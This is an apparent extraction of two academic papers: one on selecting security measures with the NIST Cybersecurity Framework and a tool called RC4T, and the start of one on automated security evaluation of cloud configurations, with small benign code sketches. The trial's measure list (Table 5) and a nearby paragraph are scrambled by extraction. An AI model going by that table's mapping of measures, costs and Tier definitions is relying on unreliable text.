However, the Cybersecurity Framework does not
have a function to select and enumerate specific
measures on the basis of mutual understanding
between executives and administrators. By applying
the Cybersecurity Framework and use cases of the
framework provided by the Intel Corporation, we
propose a method that can enumerate measures and
obtain the optimal combination of measures that
leads to mutual agreement between executives and
administrators. Moreover, the authors implemented
a system called Risk Communicator for Tier
(RC4T) to support the framework. By applying this
framework and RC4T to a small example, we were
able to enumerate specific measures for obtaining
mutual consensus between executives and
administrators.

KEYWORDS
Cybersecurity Framework
Information security management
Information security governance
Risk management
Consensus building

1 INTRODUCTION


In recent years, incidents related to information


security have been increasing. However, the
awareness of companies involved in
information security is insufficient [1]. One
cause is the poor understanding of information
security between executives (e.g. CIO, CEO)
and IT administrators (e.g. security manager)
[1]. If the understanding is poor, executives will
not be reasonably aware of the organization's
information security and will be less likely to
fund information security measures. For this
reason, the level of company-wide information
security could be reduced because adequate
information security measures for the entire
organization might not be implemented.
Because some executives have minimal
technical knowledge, methods to treat
information security as a risk have been
proposed [2]. One of these methods is the
Cybersecurity Framework (CSF) proposed by
the National Institute of Standards and
Technology (NIST) [3]. CSF is a framework for
information security management. In this
framework, the current state and the target state
of information security management are
compared in order to express, understand and
manage the risks associated with information
security. In general, it is assumed that
executives are able to understand the current
state of information security of an organization
by comparing the current state and the target
state. Therefore, CSF is expected to facilitate a
mutual understanding between executives and
administrators. In addition, the usefulness of the
CSF is expected from the experimental result of
applying the CSF to actual issues, as was done


by the Intel Corporation [4]. However, it is


necessary to enumerate and select measures to
fulfill the overall targets of an organization.
Because the CSF compares the current state and
the target state, it is impossible to enumerate
and select specific measures to reach the target.
By considering use cases of the Intel
Corporation as well as other cases related to the
CSF, we found some guidelines for
implementing the CSF. However, the
guidelines do not include a method for
enumerating and selecting measures. Therefore,
we propose a method to obtain the optimal
combination of measures that leads to a mutual
understanding between executives and administrators. Moreover, to support the
method, we developed a system named Risk
Communicator for Tier (RC4T). In this paper,
we propose processes to take the consensus of
proposed measures between executives and
administrators. In addition, we verify whether
we can reach a consensus by using RC4T in the
authors' laboratory.

2 OVERVIEW of CSF

The CSF is a framework that summarizes the risk management principles for the purpose of improving the cybersecurity of critical infrastructures. In addition, the CSF can possibly fill the gap between the current state and the target state, and the gap in the level of understanding between executives and administrators, in a risk-based approach. The CSF, which can be customized to fit the needs of each organization, is composed of the following three elements:
(1) Framework Core
(2) Framework Implementation Tiers
(3) Framework Profile

Figure 1. Structure of the Core (created according to reference [4]).

2.1 Framework Core

The framework core (hereinafter referred to as Core) consists of Functions, Categories, Subcategories and Information References (Fig. 1).
Functions, which are the most basic content for the information security measures, include Identify, Protect, Detect, Respond and Recover. Categories are obtained by subdividing the Functions (Fig. 2).
Subcategories are obtained by subdividing the Categories and summarizing the information necessary to denote the Categories to which the Subcategories belong.
Information References are assigned to each Subcategory. Information References help classify the Subcategories.


Identify: Asset Management, Business Environment, Governance, Risk Assessment, Risk Management Strategy
Protect: Access Control, Awareness / Training, Data Security, Protective Process / Procedures, Maintenance, Protective Technologies
Detect: Anomalies / Events, Security Continuous Monitoring, Detection Process
Respond: Response Planning, Communication, Analysis, Mitigations, Improvements
Recover: Recovery Planning, Improvements, Communication

Figure 2. Categories of the Core (created according to reference [4]).

2.2 Framework Implementation Tiers


The framework implementation tiers (hereinafter referred to as Tiers) comprise four stages, or four tiers, of the risk management
processes of an organization. As the Tier
number increases from Tier 1 to Tier 4, the
adaptedness of the state increases (Fig. 3).

Figure 3. Adaptedness of Tiers.

2.3 Framework Profile

The framework profile (hereinafter referred to as Profile) is a summary of Categories and Subcategories excerpted from the requirements of an organization. If the organization sets the Profile of its own target, the organization can evaluate the gap by comparing the Profile of the current state and the Profile of the target state.

3 USE CASE of CSF by INTEL CORPORATION

Intel Corporation carried out a pilot project to


verify the usefulness of the CSF.
3.1 Groups in the Pilot Project
The following three groups were formed in the
pilot project.
(1) Core Group
The Core Group consists of 8-10 engineers
with knowledge of advanced information
security. The Core Group has the authority
to select and edit Categories and to set
targets. In this paper, the Core Group
includes the chief information security
officer (CISO).
(2) Individual Security Subject Matter Experts
(SMEs)
The SMEs have the authority to evaluate
the risks in their specialized area. In this
paper, the SMEs are administrators.
(3) Stakeholders and Decision Makers
Stakeholders and decision makers have the
authority to evaluate a target, review the
result of the evaluation, and set the
acceptable risk. In this paper, stakeholders
and decision makers, except the CISO, are
executives.
3.2 Policy of Pilot Project


In the pilot project, Subcategories were


excluded for simplification and instead,
Categories were enriched. In addition, specific
definitions of each Tier were set and listed in a
table. Then, the definitions were used as an
index for evaluation by the Tier (Table 1).


Table 1. Example of Tier Definitions (created according to [5]).
Tier 1: Cybersecurity professionals (staff) and the general employee population have had little to no cybersecurity-related training. A risk management process has not been formalized; risks are managed in a reactive, ad hoc manner.
Tier 2: The staff and employees have received cybersecurity-related training. Prioritization of cybersecurity activities is informed by organizational risk objectives, the threat environment, or mission requirements.
Tier 3: The staff possesses the knowledge and skills to perform their appointed roles and responsibilities. Consistent risk management practices are formally approved and expressed as policy, and there is an organization-wide approach to manage cybersecurity risk.
Tier 4: The staff's knowledge and skills are regularly reviewed for currency and applicability, and new skills and knowledge needs are identified and addressed. Cybersecurity risk management is an integral part of the organizational culture.

Moreover, an administrator evaluated the value


of each Tier for the risk assessment of each
Category. By comparing the current state and
the target state, a heat map was created by
emphasizing the lower value of the Tier with a
red color (Fig. 4). Here, the heat map would be
a Profile in the pilot project.
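A minimal sketch of the comparison behind such a heat map (the Category names and Tier values below are illustrative, not Intel's data): the gap between the target Tier and the evaluated Tier is computed per Category, and Categories below target are the ones that would be highlighted in red.

# Illustrative current-state evaluations and targets (Tier 1-4) per Category.
current = {"Asset Management": 2, "Access Control": 3, "Awareness / Training": 1}
target  = {"Asset Management": 3, "Access Control": 3, "Awareness / Training": 3}

def heat_map(current, target):
    """Per-Category gaps; a positive gap means the Category is below target (shown in red)."""
    return {cat: target[cat] - current.get(cat, 1) for cat in target}

for category, gap in heat_map(current, target).items():
    flag = "RED" if gap > 0 else "ok"
    print(f"{category:22s} current={current[category]} target={target[category]} [{flag}]")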

Figure 4. Example of heat map (created according to [5]).

3.3 Process and Effect of Pilot Project

The pilot project was continued for seven months and followed the flow from (1) to (4) below by introducing the definitions of Tiers and the heat map.
(1) The CISO sets the target Tier for each Category.
(2) The administrators evaluate the current state.
(3) The CISO and the administrators analyze the result of the evaluation.
(4) The CISO and the administrators communicate with executives by using the analysis result.
By taking these actions, the Intel Corporation obtained the expected effects: information security was discussed within the company, and the current state was more easily explained to stakeholders.

4 RELATED WORK

Another example of a CSF application was reported at the University of Chicago [5]. They conducted a comparative study of current states and targets by inputting values of 0 to 4, derived from ISO 15504, in each Category.
Related research on obtaining a consensus on measures with executives led to the development of a system called the Multiple Risk Communicator (MRC) [6]. This system outputs the optimal combination of measures from inputs of the quantitative effect of each measure and the constraints, such as a cost limit and an objective function. With the MRC, we can obtain the optimal combination of measures under the constraints set by the executives. Therefore, we find that the MRC is effective for building consensus to select measures.

5 PROPOSED METHOD to ENUMERATE and SELECT MEASURES


The CSF only compare the current state and the


target state. Therefore, a method to enumerate
and select measures for evolving the current
state to the target state is required.
Applications and discussions related to the CSF
have been studied. However, we could not find
research and applications that consider the
measures to approximate the current and target
states.
In the MRC, building consensus of information
security with the executives has been difficult
in an environment of insufficient mutual understanding between executives and administrators, because consensus using the
MRC needs executives who have enough


knowledge of information security and enough


time [7].
5.1 Process for Using CSF between
Executives and Administrators
Accordingly, the authors propose processes for
using the CSF, as shown in Fig. 5. The
processes were proposed to enumerate
measures and selecting the optimal combination
of measures for obtaining mutual understanding
between executives and administrators. The
following steps show the descriptions of (1) to
(8) in Fig. 5.
(1) The CISO, who is included in the Core Group, inputs the Categories and Tier definitions into the system after agreement with the executives.
(2) The administrators input the current state of their related areas in each Category into the system.
(3) The system shows the current state in Profile form to the executives and the CISO.
(4) The executives and the CISO understand the current state from the Profile. In addition, they set the target Tier in each Category. They also indicate the acceptable total cost for measures.
(5) The CISO and administrators understand the range of necessary measures by using the information from the system.
(6) The CISO and administrators have a meeting to enumerate the measures. Then, they input the measures, the measures' costs and the measures' effects into the system, as shown in Fig. 6.
(7) The system computes and shows the optimal combination of measures within the acceptable cost to minimize the gap between the target and current states for the executives and the CISO, as in the MRC. It is possible to provide the system with a function to set measures that should always be adopted in the computation, because the executives might order some measures to be adopted.
(8) If the executives and the CISO are satisfied with the total cost and the state achieved by carrying out the measures, the combination of measures will be adopted and carried out. If the executives and the CISO are not satisfied, the system returns to step (6) to come up with a new acceptable cost and Categories to close the gap.

Figure 5. Process of using the CSF for executives, the CISO and administrators.

5.2 Method of Enumerating Measures


The authors defined Tier 1 as a state that does not fit into any other Tier. We also defined that each Tier is fulfilled only when all definitions of that Tier are satisfied. In addition, we assigned an ID to each definition (e.g., 2-1, 3-2). Given these definitions, we propose to describe the effect of each measure by the target administrators of the measure, the target Categories of the measure, and the Tier definitions solved by the measure [8].
In the table of Tier definitions and measures shown in Fig. 6, one marking indicates the range that the current state fulfills and another indicates the range that a measure fulfills. We assume that the effect of Measure 3 is Tier definition 3-1 of Category 1 of Administrator 1, and that the effect of Measure 4 is Tier definitions 3-2 and 3-3 of Category 1 of Administrator 1. Then, Category 1 of Administrator 1 is raised to Tier 3, because all the definitions of Tier 3 are fulfilled when Measure 3 and Measure 4 are carried out. Consequently, we can optimize the combination of measures to minimize the gap between the current state and the target state under the cost constraints.
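A hedged sketch of this selection step for a single administrator and Category (the Tier definition IDs follow the 2-1/3-3 style used above, but the measures, costs and budget are illustrative, not the RC4T data): a brute-force search over measure subsets within the cost budget, minimizing the remaining gap to the target Tier.

from itertools import combinations

# Tier definition IDs that must all hold to reach Tier 2 and Tier 3 (illustrative, as in Table 4).
TIER_DEFS = {2: {"2-1", "2-2"}, 3: {"2-1", "2-2", "3-1", "3-2", "3-3"}}

def tier_of(fulfilled):
    """Highest Tier whose definitions are all fulfilled (Tier 1 otherwise)."""
    return max([1] + [t for t, defs in TIER_DEFS.items() if defs <= fulfilled])

# Illustrative data for one (administrator, Category) pair.
current_defs = {"2-1"}                       # currently fulfilled definitions
target_tier = 3
measures = {                                 # measure -> (cost in hours, definitions solved)
    "M01": (0.5, {"2-2"}),
    "M02": (1.0, {"3-1", "3-2"}),
    "M03": (2.0, {"3-3"}),
    "M04": (3.0, {"3-1", "3-2", "3-3"}),
}
budget = 4.0

best = None
for r in range(len(measures) + 1):
    for combo in combinations(measures, r):
        cost = sum(measures[m][0] for m in combo)
        if cost > budget:
            continue
        fulfilled = current_defs.union(*(measures[m][1] for m in combo))
        gap = max(0, target_tier - tier_of(fulfilled))
        if best is None or (gap, cost) < (best[0], best[1]):
            best = (gap, cost, combo)

print(best)  # e.g. (0, 3.5, ('M01', 'M04')): reaches Tier 3 within the budget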


Figure 6. Table of Tier definitions and measures for Administrator 1.

6 DEVELOPMENT of RC4T (RISK COMMUNICATOR for TIER)

The authors developed a system named RC4T (Risk Communicator for Tier) to assist the process shown in Fig. 5. The RC4T is developed in Java 8, and the program comprises about 2,600 lines. The RC4T provides an "inputting the current state" tool and an "understanding the current state" tool.
The "inputting the current state" tool is used to input the Tier definitions of the current state given by the administrators.
The "understanding the current state" tool is used by executives to understand the current state based on the data entered with the "inputting the current state" tool. In addition, administrators can enumerate measures by using this tool and seeing the effect of the measures.
For more information about each tool, refer to [8].

7 TRIAL APPLICATION

7.1 Result of Trial Application

By using the processes shown in Fig. 5, we showed that executives can enumerate measures and obtain satisfactory combinations of measures. A trial application was carried out in the authors' laboratory to confirm this result. In our laboratory, different work tasks to maintain the operations of the laboratory are assigned to the students. The leader of each task is called an administrator. In the university, members change every year. Therefore, the administrators are replaced every year.
However, the replacement is often not successful due to a lack of communication. Therefore, we decided to improve the system for administrator replacement.
In this trial application, the first author of this
paper acted as the CISO, and the second author,
who is a professor at the laboratory, acted as the
executive.
Table 2 shows the administrators who
participated in this trial application.
Table 2. Administrators for the trial application.
PLA: Administrator of planning. Work: planning events and managing the cost of events.
PUB: Administrator of public relations. Work: managing the web page of the laboratory.
CYB: Administrator of groupware. Work: managing the groupware of the laboratory.

The trial application was conducted as follows:


(a) The CISO decided the Categories and
definitions of the Tier as shown in (1) of
Fig. 5. Moreover, they set the target of the
Tier in each Category. Tables 3 and 4 show
the Categories and the definitions of Tiers
that were finally decided.
Table 3. Categories used in the trial application.
Identify: ID.AM (Asset management), ID.BE (Business environment), ID.RA (Risk assessment)
Protect: PR.AC (Access control), PR.AT (Awareness / Training), PR.DS (Data security)
Respond: RS.IM (Improvement)
For each Category, the table also records the executive's evaluation of the current Tier and the target Tier (values between 2 and 4).
Table 4. Tier definitions used in the trial application.
2-1: We identified the information that should be given to the replacement student about this category.
2-2: We understand the risk and damage when this category is impaired.
3-1: Taking over this category is carried out accurately and smoothly by documentation.
3-2: We have the knowledge, skill and assets to fulfill the responsibility of this category.
3-3: We defined a policy to manage the risk of this category.
4-1: Our current organization can improve the subject of replacement.
4-2: We learn and respond of our own accord about this category.
4-3: Risk management of this category is the policy of our laboratory.

Then, the CISO inputted the Categories and


Tier definitions to the RC4T.
(b) The CISO asked the administrators to set the subjective Tier value for the evaluation of each Category, as shown in (2) of Fig. 5. Then, the administrators inputted into the RC4T the Tier definitions that were fulfilled in the current state. After this, the RC4T calculated the Tier values based on the inputted Tier definitions.
(c) The inputted result was shown to the CISO
and executives by using the RC4T, as
shown in Fig. 7. This process is (3) in Fig. 5.

acceptable total cost for the measures. Here,


the time to execute the measure was used as
the cost. The total time given as a constraint
was 10 hours.
(e) The CISO and the administrators
enumerated the measures and estimated the
cost and the effect of improving the Tier
(see Table 5) as shown in (5), (6) and (7) in
Fig. 5. Here, considering the risk gap
between the current state and the target state,
the CISO and the executives thought that
the measures of Awareness / Training, Risk Assessment and Asset Management should be carried out. Table 5 shows the list of measures.
Table 5. List of measures.
Measure
ID

Measure
name

M01

Organize
information
related to the
takeover
Short course
for the
awareness and
takeover
Short course
for asset
management
To include
information
about risk
assessment to
information of
the takeover.
Documentatio
n of
information of
the takeover

M02

M03
M04

M05

M06

Figure 7. Inputted result.

(d) The executives and the CISO understood


the current state by the Profile as shown in
Fig. 7, as shown in (4) of Fig. 5. The
executive ordered the CISO and the
administrators to enumerate the measures
for the Tiers that have a gap between the
current state and the target state. In addition,
the administrators needed to show an


M07

M08

M09

Admin
istrato
r ID
PUB

Categ
ory ID

Tier
definit
ion ID
2-1

Cost
(hour
)
0.5

PUB
CYB

PR.A
T

2-2
3-1

CYB

ID.A
M

2-2
3-1

PUB
CYB

ID.RA

2-1
2-2
3-2

PLA
PUB
CYB

PR.A
T
ID.A
M
ID.RA
PR.A
T

2-1
3-1

3-2

PR.A
T
ID.A
M
ID.RA
PR.A
C

3-3

0.5

3-1
3-2
3-3

PR.A
T

4-1

Improve the
takeover in
response to
the risk
To include
risk
management
in policy

PLA
PUB

Meeting for
dividing
administrative
account in
administrator
of public
relation
Make
processes for
improvement

PUB

PLA
PUB
CYB

PLA
PUB
CYB

PR.A
T


M10

M11

of takeover
Establish a
system to
perform a
regular
knowledge
confirmation
Make policies
for takeover in
the laboratory
with executive
layer

PLA
CYB

PR.A
T

4-2

PLA
PUB
CYB

PR.A
T

3-3
4-3

The system computed the optimal


combination of measures that minimized
the gap between the current state and the
target state under the cost constraint. The
calculated result showed that the
combination of M01 to M08 was optimal.
(f) The executives who knew the result from
the display of the RC4T ordered the CISO
to implement the measures, as shown in (8)
of Fig. 5.

7.2 Considerations of Trial Application

We were able to obtain the combination of measures that minimized the gap between the current state and the target state. We judge the proposed method and RC4T to be useful for easily performing risk communication related to the selection of measures between the executives and the CISO. Namely, the executives and the administrators can easily obtain a consensus on measures through the CISO by the proposed process shown in Fig. 5.
In addition, in the step of setting the organization's requirements, we found that changing the requirements for Categories and Tier definitions is difficult. Thus, a future challenge is to propose a method to easily change the requirements of Categories and Tier definitions.

8 CONCLUSION

In this paper, we proposed a method of enumerating measures and selecting the optimal combination of measures for reaching the target state of a Tier. Our example implementation was based on Intel Corporation's use case of the CSF. In addition, we developed a system called RC4T to support the method and applied it to a small practical problem. With the RC4T, the executive can know the optimized measures to fill the gap between the current state and the target state at an acceptable cost. Therefore, we validated that the proposed processes can assist the consensus on measures between executives and administrators.
In future work, we would like to propose a method to change the requirements of Categories and Tier definitions more easily.
REFERENCES
[1] Ministry of Economy, Trade and Industry, "Guidance for introduction of information security governance" (in Japanese), pp. 1-64, June 2009.
[2] K. Hayashi, "From the chief security to president security: Japanese-style management and information security" (in Japanese), Information Security Science, no. 2, pp. 1-42, Nov 2010.
[3] National Institute of Standards and Technology (NIST), "Framework for Improving Critical Infrastructure Cybersecurity version 1.0," pp. 1-43, Feb 2014.
[4] T. Casey, K. Fiftal, K. Landfield, J. Miller, D. Morgan, and B. Willis, "The Cybersecurity Framework in Action: An Intel Use Case," Intel Corporation, pp. 1-10, 2015.
[5] University of Chicago Biological Sciences Division, G2 Inc., "Applying the Cybersecurity Framework at the University of Chicago: An Education Case Study," University of Chicago, pp. 1-5, Apr 2016.
[6] R. Sasaki, Y. Hidaka, T. Moriya, K. Taniyama, H. Yajima, K. Yaegashi, Y. Kawashima and H. Yoshiura, "Development and Applications of Multiple Risk Communicator," Transactions of Information Processing Society of Japan, vol. 49, no. 9, pp. 3180-3190, Sep 2008.
[7] M. Taniyama, Y. Hidaka, M. Arai, S. Kai, H. Igawa, H. Yajima and R. Sasaki, "Application of 'Multiple Risk Communicator' to the personal information leakage problem in the enterprise," Japan Society of Security Management Journal, vol. 23, no. 2, pp. 34-51, Sep 2009.
[8] S. Fukushima and R. Sasaki, "Proposal of the method for establishing the consensus on the measures based on Cybersecurity-Framework," DICOMO 2016, pp. 1699-1704, July 2016.



Development and Evaluation of a Dynamic Security Evaluation System


for the Cloud System Operation
Motoharu SEKINE1 , Yuki ASHINO2 , Shigeyoshi SHIMA3
Yoshimi TESHIGAWARA1 and Ryoichi SASAKI1
1
Tokyo Denki University
5 Senju asahi-cho, Adachi-ku, Tokyo 120-8551 Japan
2
Platform Service Divisions, NEC Corporation
1753 Shimonumabe, Nakahara-ku, Kawasaki, Kanagawa 211-8666
3
Security Laboratories, NEC Corporation
1753 Shimonumabe, Nakahara-ku, Kawasaki, Kanagawa 211-8666
[email protected]

ABSTRACT
Because of today's sophisticated cyberattacks, IT
systems are required to take security into special
consideration from the design stage to the
operational stage. Therefore, industry organizations
as well as governments recommend that IT systems
comply with the security standards. It is necessary
for the system operator of an IT system to
comprehend these security standards and to verify
that specific security functions for the proper system
configuration are selected and implemented
appropriately. The operator is expected to perform
corresponding work for the cloud system, where the
system configuration can be changed flexibly and
quickly when necessary. However, the verification
method of security functions based on the security
standards depends on the system configuration.
Because each of the flexible changes of the cloud
system configuration needs specific security
functions and verification of installations, it is
difficult for the system operator to take full
advantage of the cloud infrastructure and it may
result in burden of the system operator. Therefore,
in order to maintain security functions by taking
advantage of the cloud infrastructure, we propose a
security evaluation method to verify security
functions automatically based on the modeled
system configuration and the security standards by
tracking the log analysis of an IT system in
operation constructed on the cloud infrastructure.
We developed a support tool to ensure that the
system complies with the security standard.
Moreover, we show the effectiveness of the


proposed method by an experimental evaluation on


the cloud infrastructure.

KEYWORDS
Operation Support, Log Analysis, Security
Evaluation, Security Standard, Cloud System,
System Configuration

1 INTRODUCTION
Because of today's sophisticated
cyberattacks, IT systems are required to take
security into special consideration from the
design stage to the operational stage. Therefore,
industry organizations as well as governments
recommend that IT systems comply with the
security standards [1].
In the design stage, the tools that ensure the IT
system is based on security standards have been
discussed [2], but the standards must also be
ensured in the operation stage. Therefore, it is
necessary for the system operator of the IT
system to comprehend these security standards
and to verify that the specific security functions
selected are based on the security standards and
implemented for the proper system configuration.
The system configuration is composed of an application's configuration in a machine
(machine configuration) and placement of the
machine in the IT system (network
configuration). However, in order to correspond to


various IT systems, the security standards are


generic. Unless standards can be written to
correspond to specific system configurations, it
is difficult to verify based on the security
standard that the specific security functions are
installed for proper system configuration
(security evaluation).
In addition, an IT system constructed on the
cloud (cloud infrastructure) that provides IT
system infrastructure includes a virtual resource
such as virtual machine and network interface.
The cloud system is now in widespread use and
is expected to continue to grow. Thus, security
standards for the cloud are in demand.
However, the following problems exist for
cloud systems. The cloud infrastructure has the
advantage that it can change the network
configuration by adding a virtual machine or a
network interface as needed for the virtual
technology. For example, a load balancer
detects an increase in server load and
distributes the load by adding a virtual machine
automatically. A new security problem can
occur due to the change of the system
configuration, even if it is based on the security
standard in the design stage. The system
configuration change may be one that the
system operator does not intend in the operation
stage. Therefore, it is necessary to execute a
security evaluation by tracing the change of the
system configuration and analyzing the current
system configuration as it changes. Thus, the
cloud can possibly be operated based on the
security standard, but it takes much time and
effort by the system operator. This means that it
is impossible to take total advantage of the
cloud infrastructure.
To maintain proper security functions, we
previously proposed a security evaluation
method [3]. In this paper, we developed a
support tool for flexible operation to take
advantage of the cloud infrastructure and we
apply this in the Cloud infrastructure. This
paper is organized as follows. In Section 2, we
describe related methods and tools. In Section 3,
we describe the security evaluation method
proposed. In Section 4, we describe the


development of a prototype for implementing


our security evaluation method. Finally, in
Sections 5 and 6, we discuss our experimental
evaluation and our intended future work.
2 RELATED METHODS AND TOOLS
To maintain security functions from the design
stage to the operation stage, it is necessary to
take appropriate security measures at each stage
of the IT system development life cycle.
Related research can be classified into the
following two categories.
One comprises the methods and tools to
evaluate IT system configuration in the design
stage. The other comprises the methods and
tools to monitor IT system operation in the
operation stage.
2.1 Evaluating of IT system configuration
The IT system is evaluated from the viewpoint
of security policy in the design stage by using a
model (evaluation model) to evaluate the
security functions. Our previous study proposed
an evaluation model for evaluation of the
strength of the cloud system [4] and an
evaluation model to mitigate the major risks on
the cloud system [5]. These models can
evaluate based on the basic policy (security
requirement) of the countermeasures required
for the IT system. In particular, it is effective to
use the evaluation model to build the IT system
in the design stage. However, because the evaluation can be made at any time as required, there is no guarantee that the evaluation model represents the IT system in the operation stage rather than only the design stage. In this paper, we can evaluate
security by tracking the change of the system
configuration with the evaluation model.
Therefore, a system can guarantee the IT
system is based on the security standard from
the design stage to the operation stage. As an
example, the Amazon Inspector automatically evaluates the appropriateness of the IT
system on the basis of knowledge and best
practices by the Amazon Web Services (AWS)


team [6]. This tool, which uses the same


method as our proposed method, evaluates the
machine configuration. However, our major
difference from the Amazon Inspector is the
ability to evaluate the network configuration as
well as the machine configuration.
2.2 Monitoring of IT system operation
To evaluate IT system security functions in the
operation stage, the system operator monitors
the system operation by managing and
analyzing the operational logs. This approach
aids the detection of insider threats by
analyzing the logs [7] and the management
system to streamline security monitoring and
auditing [8][9]. Moreover, security information
and event management (SIEM) has attracted
attention as a tool of IT system operation and
management. The SIEM can inform the
administrator of an abnormality by analyzing
logs collected from servers, network interfaces,
and applications. The SIEM is expected not
only to respond after the problem has occurred
but also to discover the symptoms of an attack.
Some tools already incorporate the SIEM
mechanism [10][11]. These methods and tools
can respond only to local problems in the
machines where logs are analyzed in real time,
and so it is difficult to evaluate the whole
configuration. In this paper, we evaluate the
whole system configuration to prevent attacks.
To conduct the evaluation, we use the logs to
analyze changes in the system configuration.

2.3 Challenges of the existing methods and tools
The following three requirements on the existing methods and tools described in 2.1 and 2.2 must be satisfied in order to maintain the security functions of the cloud system from the design stage to the operation stage.
Requirement 1: Clarification of security evaluation that does not depend on the user
For a cloud system that has security functions
based on security standards, it is necessary to
verify the suitable system configuration for the
evaluation model in the design stage and to
build the cloud system on the basis of this
design. On the other hand, in the operation
stage, security is evaluated as to whether the
system configuration of the current cloud
system is appropriate for the evaluation model
to maintain security functions. If the system
operator takes advantage of the cloud system
infrastructure, where the system configuration
can be changed easily, the current system
configuration may change from the system
configuration of the design stage. Therefore, the
system operator has to know the system
configuration after the configuration change.
The operator determines the system configuration by analysis. However, the
analysis could possibly be different because the
knowledge of each system operator varies. If
the analysis is not properly executed, the
security evaluation is incorrect. It is necessary
to generate a system configuration that does not
depend on the knowledge of the system
operator in the operation stage in order to
evaluate the security accurately.
Requirement 2: Tracking system
configuration change
The cloud infrastructure has the advantage that the

system configuration changes easily in the operation


stage. Therefore, deficiencies of the new security
measures can possibly occur with the change of
system configuration. An evaluation to maintain
security functions is needed every time the system configuration changes. However,
conventional security evaluation methods are
assumed to be used only in the design stage. In this
case, the system operator cannot make an evaluation
by tracking the changes of the system configuration
in the operation stage. Therefore, the system
operator needs to make an evaluation at an arbitrary
time. Because the system configuration often


changes, the system operator needs to carry out the evaluation more often. Maintaining the security
functions by taking advantage of the cloud
infrastructure takes unnecessary time and effort by
the system operator. To reduce this extra time and
effort, it is desirable to evaluate immediately after
the system configuration changes only. Thus, it is
necessary to track the change of the system
configuration, and to detect the machine
configuration and the network configuration where
the elements of the system configuration change
exist.
Requirement 3: Automation of security
evaluation

The conventional security evaluation is based


on the premise of a correctly designed model of
the security standard as the evaluation criteria
and the system configuration as the evaluation
target. The cloud system easily builds a
complex IT system on a large scale. It is
expected that the system operator will analyze
the system configuration in order to create a
precise model. Therefore, it is necessary to
execute the security evaluation automatically as
much as possible to reduce the burden on the
system operator.
3 PROPOSED METHOD
3.1 Method for satisfying requirements
To maintain cloud security functions, we focus
on the methods described below.
Method 1: Evaluation based on modelling
(requirement 1)
To avoid an analysis of the system
configuration that depends on the knowledge of
the system operator, we provide a reference
model for system configuration (system
configuration model). The system configuration
model is based on the Common Information
Model (CIM) created by the Distributed
Management Task Force (DMTF). The model
represents the relevance among multiple objects


such as machines or applications on the system


configuration [12]. In this study, we analyze the
system configuration based on this system
configuration model, which represents the
connections among virtual machines and their
roles.
Method 2: Detection of the system
configuration changes (requirement 2)
For evaluating the security in association with
the system configuration changes, it is
necessary to track the system configuration
changes by detecting them. To do this, we
apply the following two methods using
monitoring machines and the network
configuration. We explain the details below.
(a) Detection of machine configuration
changes
By monitoring a virtual machine, tracking the
system configuration changes is executed. The
method analyzes a log outputted when a system
setting is changed. This log includes various
machine activity records, such as launching
applications and logging in by the machine user.
We read the application activity changes in the
log and detect the configuration changes inside
the machine.
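As an illustration of this log-based detection (not part of the System Design Checker itself), the following Python sketch polls hypothetical setting files and reports when their contents change; in the proposed system the equivalent monitoring is performed through OSSEC, and the file names below are placeholders.

import hashlib
import time

# Hypothetical setting files to watch; the files actually monitored depend on the machine role.
WATCHED_FILES = ["/etc/apache2/ports.conf", "/etc/mysql/my.cnf"]

def digest(path):
    """Return a SHA-256 digest of a setting file, or None if the file is missing."""
    try:
        with open(path, "rb") as f:
            return hashlib.sha256(f.read()).hexdigest()
    except FileNotFoundError:
        return None

def watch(interval=60):
    """Poll the setting files and report a machine configuration change when a digest differs."""
    state = {p: digest(p) for p in WATCHED_FILES}
    while True:
        time.sleep(interval)
        for path in WATCHED_FILES:
            current = digest(path)
            if current != state[path]:
                state[path] = current
                # In the proposed system this event triggers a security evaluation.
                print("configuration change detected:", path)

if __name__ == "__main__":
    watch()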
(b) Detection of network configuration
changes
To track added or deleted machines in a virtual
machine, we use an Application Programming
Interface (API) that manages network
configuration changes, such as adding or
deleting machines and changing the cloud
configuration. A virtual machine is deployed on
the cloud platform constructed by the host
machines. Therefore, by reading the setting of
the cloud platform from the host machines, it is
possible to analyze the connection among
virtual machines. By monitoring this setting,
we can detect the network configuration
changes.
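A minimal sketch of this idea, assuming the script runs on a Hyper-V host where the Get-VM PowerShell cmdlet is available; the commands and data handling are illustrative and are not taken from the paper.

import subprocess

def list_virtual_machines():
    """Read the names of the virtual machines deployed on the Hyper-V host."""
    completed = subprocess.run(
        ["powershell", "-Command", "Get-VM | Select-Object -ExpandProperty Name"],
        capture_output=True, text=True, check=True)
    return {name.strip() for name in completed.stdout.splitlines() if name.strip()}

def detect_network_change(previous):
    """Compare the current VM set with a previous snapshot and report added or deleted machines."""
    current = list_virtual_machines()
    added, deleted = current - previous, previous - current
    if added or deleted:
        # A detected change is shared with the management server and triggers re-evaluation.
        print("added:", added, "deleted:", deleted)
    return current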


Method 3: Systematization of security


evaluation (requirement 3)
To reduce the system operator's work in the
cloud security evaluation, the evaluation should
be made automatically. Therefore, by applying
the system configuration model with each
machine configuration to the evaluation model,
the security function settings are checked to
determine if they are appropriate. To collect the
application data for the machine configuration,
agents are deployed for the analysis. The
applications in the machine run based on the
setting files. Therefore, by reading the setting
files and extracting the necessary evaluation
data, such as the machine IP address or the port
number that the application uses, the machine
configuration to be the basic data for the
machine configuration model is obtained. Then,
by aggregating the machine configurations
obtained from each machine, the system
configuration model is made. By applying this
aggregated model to the evaluation model, we
can evaluate the security in the cloud
automatically.
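The following Python sketch illustrates this flow under simplifying assumptions: a hypothetical Apache setting file is read to extract listening ports, and the per-machine configurations are aggregated into one model. The file path and data layout are placeholders and do not reproduce the format used by the MG.

import re

def read_apache_ports(path="/etc/apache2/ports.conf"):
    """Extract the port numbers that Apache listens on from its setting file."""
    ports = []
    try:
        with open(path) as f:
            for line in f:
                m = re.match(r"\s*Listen\s+(\d+)", line)
                if m:
                    ports.append(int(m.group(1)))
    except FileNotFoundError:
        pass
    return ports

def machine_configuration(ip_address):
    """Build the per-machine part of the system configuration model."""
    return {"ip": ip_address, "web_ports": read_apache_ports()}

def system_configuration_model(machine_configs):
    """Aggregate the machine configurations collected from each agent into one model."""
    return {"machines": machine_configs}

# Example: aggregate two hypothetical machine configurations.
model = system_configuration_model([
    {"ip": "192.168.10.2", "web_ports": [80]},
    {"ip": "192.168.20.2", "web_ports": []},
])
print(model)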
3.2 Outline of the proposed method
To maintain the cloud system, we developed a
system named System Design Checker.

Figure 1 Security evaluation process

In method 1, the current system configuration model is made by collecting and sending the data of the virtual machine such as A or B in


the cloud system from the management tool (OSSEC), which is an open-source host-based intrusion detection system, to the system operator's machine, and aggregating the collected data.
